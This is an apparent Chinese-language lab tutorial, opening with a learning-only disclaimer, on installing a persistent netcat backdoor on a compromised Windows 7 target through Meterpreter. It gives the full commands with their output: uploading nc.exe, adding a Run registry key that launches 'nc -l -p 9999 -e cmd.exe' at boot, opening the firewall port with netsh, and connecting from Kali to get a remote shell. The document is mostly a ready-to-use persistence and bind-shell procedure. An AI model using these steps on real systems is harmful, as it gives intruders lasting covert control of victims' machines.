本文章仅用于信息安全学习，请遵守相关法律法规，严禁用于非法途径。若读者因此作出任何危害网络安全的行为，后果自负，与作者无关。

首先假设已经通过Kail成功入侵靶机：https://blog.csdn.net/mshxuyi/article/details/136377760

一、通过Kail创建NC后门 

1、拷贝NC到靶机 

meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32

# 输出
[*] Uploading  : /usr/share/windows-binaries/nc.exe -> c:\windows\system32\nc.exe
[*] Completed  : /usr/share/windows-binaries/nc.exe -> c:\windows\system32\nc.exe

2、通过注册表设置开机启动

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v Netcat -d 'C:\windows\system32\nc.exe -l -d -p 9999 -e cmd.exe'

# 输出
Successfully set Netcat of REG_SZ.

3、进入Shell

meterpreter > shell

# 输出
Process 1548 created.
Channel 2 created.
Microsoft Windows [°汾 6.1.7600]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£


# 改变编码
C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

 4、创建防火墙规则

C:\Windows\system32>netsh firewall add portopening TCP 9999 "Netcat" ENABLE ALL

# 输出
netsh firewall add portopening TCP 9999 "Netcat" ENABLE ALL

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Ok.

二、重启Win7靶机，并查看

1、查看开机启动项

2、查看防火墙规则

3、查看进程

三、验证后门

1、连接靶机

┌──(root?Kali)-[~]
└─# nc -v 10.3.0.234 9999

# 输出
10.3.0.234: inverse host lookup failed: Unknown host
(UNKNOWN) [10.3.0.234] 9999 (?) open
Microsoft Windows [°汾 6.1.7600]
°爨?? (c) 2009 Microsoft Corporation??±?????{??

2、查看主机名

C:\Windows\system32>hostname

# 输出
hostname
tomma-PC